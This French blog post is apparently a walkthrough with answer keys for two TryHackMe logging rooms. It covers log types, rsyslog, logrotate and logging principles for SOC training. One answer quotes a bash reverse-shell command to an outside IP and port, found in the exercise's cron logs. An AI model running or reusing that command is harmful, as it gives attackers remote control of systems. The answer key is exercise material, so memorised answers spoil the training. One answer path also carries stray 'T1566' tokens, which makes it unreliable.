Nous avons couvert une introduction à la journalisation dans laquelle nous avons discuté de la logique de création de journaux et des raisons pour lesquelles nous créons des journaux. Des journaux sont créés et générés pour suivre les performances, analyser les incidents de sécurité et établir un modèle à partir duquel les événements futurs peuvent être prédits. Les journaux peuvent être des journaux système, des journaux d'applications, des journaux de sécurité, des journaux d'audit, des journaux de serveur et des journaux de base de données. Le processus de gestion des journaux commence par la collecte des journaux, leur stockage dans un emplacement central, leur analyse, puis leur analyse à l'aide d'outils d'analyse de journaux et de SIEM. Cela faisait partie de TryHackMe Introduction aux journaux procédure pas à pas qui fait partie de TryHackMe SOC Level 2 Track.

Cet article couvre également les réponses pour Opérations de journalisation TryHackMe Chambre.

Notes d'étude OSCP

Le cours pratique complet sur les tests d’intrusion d’applications Web

Points forts

Les fichiers journaux sont des enregistrements d'événements enregistrés dans un fichier sous forme de liste. Ils peuvent inclure toutes sortes d’informations sur des événements survenus à un moment donné. Chaque appareil du réseau crée des fichiers journaux, vous donnant ainsi un historique de ce qui se passe.
Les journaux contiennent généralement cinq zones dirigées vers le haut. Ils sont:

  • Horodatage : l'heure de l'événement. 
  • Niveau de journalisation : gravité ou importance de l'événement.
  • Nom d'utilisateur – qui a provoqué l'événement.
  • Service ou application – quelle est la cause de l'événement.
  • Description de l'événement – ce qui s'est passé.

Types de fichiers journaux

  • Journal des événements –enregistre des informations sur l'utilisation du trafic réseau et suit les tentatives de connexion, les événements d'application et les tentatives de mot de passe ayant échoué.
  • Journal du système (ou syslog) – enregistre les événements du système d'exploitation, y compris les messages de démarrage, les modifications du système, les arrêts, ainsi que les erreurs et avertissements.
  • Journal du serveur – contient un enregistrement des activités dans un document texte lié à un serveur spécifique sur une période de temps spécifique.
  • Journal des modifications – répertorie les modifications apportées à une application ou à un fichier.
  • Journal de disponibilité – suit la disponibilité, la disponibilité et les performances du système.
  • Journal des autorisations et des accès – répertorie qui accède aux applications ou aux fichiers.
  • Journal des ressources : fournit des informations sur les problèmes de connectivité et tout problème de capacité.
  • Journaux d'applications Messages sur des applications spécifiques, y compris l'état, les erreurs, les avertissements, etc.
  • Journaux d'audit Activités liées aux procédures opérationnelles cruciales pour la conformité réglementaire.
  • Journaux de sécurité Événements de sécurité tels que les connexions, les modifications d'autorisations, l'activité du pare-feu, etc.
  • Journaux réseau Trafic réseau, connexions et autres événements liés au réseau.
  • Journaux de base de données Activités au sein d'un système de base de données, telles que les requêtes et les mises à jour.
  • Journaux du serveur Web Requêtes traitées par un serveur Web, y compris les URL, les codes de réponse, etc.

Réponses de la salle | TryHackMe Introduction aux journaux

Quel est le nom de votre collègue qui a laissé une note sur votre bureau ?

Poiré

Quel est le chemin d'accès complet au fichier journal suggéré pour l'enquête initiale ?

T1566/var/log/gitlab/nginx/access.logT1566

D'après la liste des types de journaux de cette tâche, quel type de journal est utilisé par le fichier journal spécifié dans la note de la tâche 2 ?

journal du serveur Web

D'après la liste des formats de journal de cette tâche, quel format de journal est utilisé par le fichier journal spécifié dans la note de la tâche 2 ?

combiné

Après avoir configuré rsyslog pour sshd, quel nom d'utilisateur apparaît à plusieurs reprises dans les journaux sshd à l'adresse /var/log/websrv-02/rsyslog_sshd.log, indiquant des tentatives de connexion infructueuses ou un forçage brutal ?

Stansimon

Quelle est l'adresse IP du SIEM-02 basée sur le fichier de configuration rsyslog /etc/rsyslog.d/99-websrv-02-cron.conf, qui est utilisé pour surveiller les messages cron ?

10.10.10.101

Sur la base des journaux générés dans /var/log/websrv-02/rsyslog_cron.log, quelle commande est exécutée par l'utilisateur root ?

/bin/bash -c « /bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1 »

Sur la base de la configuration de logrotate /etc/logrotate.d/99-websrv-02_cron.conf, combien de versions des anciennes copies de fichiers journaux compressés seront conservées ?

24

Sur la base de la configuration de logrotate /etc/logrotate.d/99-websrv-02_cron.conf, quelle est la fréquence de rotation des journaux ?

horaire

Lors de l'accès à l'URL de la visionneuse de journaux pour les fichiers journaux bruts non analysés, quelle erreur « /var/log/websrv-02/rsyslog_cron.log » affiche-t-il lors de la sélection des différents filtres ?

pas de champ de date

Quel est le processus de normalisation des données analysées dans un format plus facilement lisible et interrogeable ?

Normalisation

Quel est le processus de consolidation des journaux normalisés pour améliorer l’analyse des activités liées à une adresse IP spécifique ?

Enrichissement

Réponses de la salle | Opérations de journalisation TryHackMe

Lequel des objectifs de journal donnés serait approprié pour mesurer le coût d’utilisation d’un service ?

Opérationnel

Lequel des objectifs de journalisation indiqués serait approprié pour enquêter sur les journaux d'applications à des fins d'amélioration et de stabilité ? 

Déboguer

Vous êtes consultant travaillant pour une startup en pleine croissance. En tant que consultant, vous avez participé à une session de planification de la configuration des journaux. L'entreprise pour laquelle vous travaillez s'efforce de se conformer au traitement des informations de paiement. L’ensemble de questions donné est en cours de discussion.

À quelle question la réponse peut-elle être « autant que celle mentionnée dans les exigences PCI DSS » ?

De combien avez-vous besoin pour vous connecter

La session continue et vos coéquipiers ont besoin de votre aide ; ils négocieront le budget d'exploitation forestière et les détails de l'exploitation. En tant que consultant, vous devez leur rappeler un point essentiel :

Quelles exigences ne sont pas négociables ?

exigences opérationnelles et de sécurité

Votre équipe travaille sur des politiques pour décider quels journaux seront stockés et quelle partie sera disponible pour analyse.
Lequel des principes de journalisation donnés serait mis en œuvre et amélioré ?

Archivage et accessibilité

Votre équipe a mis en œuvre un tout nouveau produit de journalisation API. L'un des membres de l'équipe a été chargé de collecter les journaux générés par ce nouveau produit. Le membre de l'équipe a signalé des erreurs continues lors du transfert des journaux vers la plateforme de révision.
Dans ce cas, laquelle des difficultés indiquées se produit ?

Processus et archivage

En tant que consultant, vous effectuez une évaluation complète des risques et avez remarqué que l'une des équipes de développement a mis en œuvre un script personnalisé pour générer des journaux pour un ancien système, qui omet les journaux à certaines phases.

Comment appelleriez-vous cela ? (Erreur ou pratique ?)

Erreur

Vidéo pas à pas

, ,
Montrer les Commentaires

Motasem

A propos de l'Auteur

Je crée des notes de cybersécurité, des notes de marketing numérique et des cours en ligne. Je fournis également des conseils en marketing numérique, y compris, mais sans s'y limiter, le référencement, les publicités Google et Meta et l'administration CRM.

Voir les Articles